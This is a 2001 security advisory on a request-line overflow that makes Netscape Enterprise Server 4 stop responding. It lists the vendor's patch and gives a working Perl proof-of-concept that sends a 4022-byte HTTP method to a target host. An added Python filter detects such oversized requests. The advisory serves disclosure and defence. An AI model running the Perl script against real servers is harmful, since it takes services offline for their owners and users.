Digizen Security Group advisory, 2001

Netscape Enterprise Server 4 Method and URI overflow

Systems affected: Netscape Enterprise Server 4/SP7 (possibly 4/SP3-SP7) running on Windows NT and Win2k
Risk: Denial of Service
Date: 18 May 2001
Vendor Notified: 25 April 2001

Legal Notice:
This Advisory is Copyright (c) 2001 Digizen Security Group and Roberto Cardona. You may distribute it unmodified. You may not modify it and distribute it or distribute parts of it without the author's written permission.

Disclaimer:
In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use of this information. Any use of this information is at the user's own risk.

Description:
Sending an invalid method or URI request of 4022 bytes causes Netscape Enterprise Server to stop responding to requests.

Vendor Status:
Netscape was informed and responded on the same business day.

Vendor's Response:
The security & stability of iPlanet's customer's environments is one of our paramount concerns. To ensure the stability of our customer's environments iPlanet has made available an NSAPI patch that can be applied to iPlanet Web Server, Enterprise Edition version 4.1 Service Packs 3 through 7. The NSAPI patch is available at http://www.iplanet.com/products/iplanet_web_enterprise/iwsalert5.11.html. This issue will also be addressed by the release of iPlanet Web Server, Enterprise Edition version 4.1 Service Pack 8.
--------------------------------------------------------------------------------------

#!/usr/bin/perl
use IO::Socket;

if (@ARGV < 2) {
    print "Usage: host port\n";
    exit;
}

# Request method of 4022 bytes, the length given in the Description.
$overflow = "A" x 4022;

&connect;
sleep(15);
# The second request shows whether the server still answers.
&connect;
exit;

################################################
sub connect() {
    $sock = IO::Socket::INET->new(Proto    => "TCP",
                                  PeerAddr => $ARGV[0],
                                  PeerPort => "$ARGV[1]",)
        or die "Cant connect to $ARGV[0]: $!\n";
    $sock->autoflush(1);

    # The oversized string takes the place of the HTTP method.
    print $sock "$overflow /index.html HTTP/1.0\n\n";

    # Print the status line, then the rest of the response.
    $response = <$sock>;
    print "$response";
    while (<$sock>) {
        print "$_\n";
    }
    close $sock;
}
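
For servers that cannot be patched immediately, a request-line length check in a filtering proxy or log review script catches the condition in the Description. The following is an added example, not part of the original advisory or of any iPlanet patch; the length limits, the method allow-list and the sample requests are assumptions constructed for illustration.

```python
from typing import List, Tuple

# Assumed policy values, not vendor figures. Both sit far below the
# 4022-byte method/URI length named in the advisory.
MAX_METHOD_LEN = 16
MAX_URI_LEN = 2048
KNOWN_METHODS = {b"GET", b"HEAD", b"POST", b"PUT", b"DELETE", b"OPTIONS", b"TRACE"}


def check_request_line(raw: bytes) -> Tuple[int, str]:
    """Classify the first line of a raw HTTP request.

    Returns (0, "ok") when the request may be forwarded, otherwise the
    HTTP status a filtering proxy would answer with and the reason.
    """
    line = raw.partition(b"\n")[0].rstrip(b"\r")
    parts = line.split(b" ")
    # "METHOD URI" (HTTP/0.9) or "METHOD URI VERSION", no empty tokens.
    if len(parts) not in (2, 3) or not all(parts):
        return 400, "malformed request line"
    method, uri = parts[0], parts[1]
    # Length checks come first so an oversized token is reported as such.
    if len(method) > MAX_METHOD_LEN:
        return 400, "method token is %d bytes" % len(method)
    if len(uri) > MAX_URI_LEN:
        return 414, "URI is %d bytes" % len(uri)
    if method not in KNOWN_METHODS:
        return 501, "method not in allow-list"
    return 0, "ok"


# Constructed sample requests (not captured traffic).
SAMPLES = [
    b"GET /index.html HTTP/1.0\n\n",
    b"A" * 4022 + b" /index.html HTTP/1.0\n\n",      # oversized method
    b"GET /" + b"A" * 4022 + b" HTTP/1.0\r\n\r\n",   # oversized URI
    b"FOO / HTTP/1.0\n\n",                           # short unknown method
    b"GET\n\n",                                      # no URI at all
]


def scan(samples: List[bytes]) -> List[Tuple[int, str]]:
    """Run the check over a list of raw requests."""
    return [check_request_line(s) for s in samples]


if __name__ == "__main__":
    for status, reason in scan(SAMPLES):
        print(status, reason)
```
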